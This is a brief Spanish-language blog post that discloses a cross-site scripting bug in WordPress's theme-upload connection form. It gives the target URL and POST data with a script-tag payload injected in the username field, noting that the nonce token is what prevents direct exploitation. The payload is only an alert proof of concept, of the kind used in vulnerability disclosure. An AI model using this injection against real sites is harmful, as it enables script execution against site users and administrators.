Necesitasconocimento pevio para entender lo que hemos hecho:
http://web.com/wp-admin/update.php?action=upload-theme&package=pakete.zip&_wpnonce=1aaaaa1a1a
donde la variable _wpnonce es la que no nos deja explotar el xss directamente.
data POST puede ser con Live http headers:
hostname=host.com&username=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&password=asdds&connection_type=ftps&upgrade=Proceed
Y ahora tenemos el Xss =)
Wordpress se está poniendo muy vulnerable...
Bug encontrado por Iter...
Saludos
Dr.White
No hay comentarios:
Publicar un comentario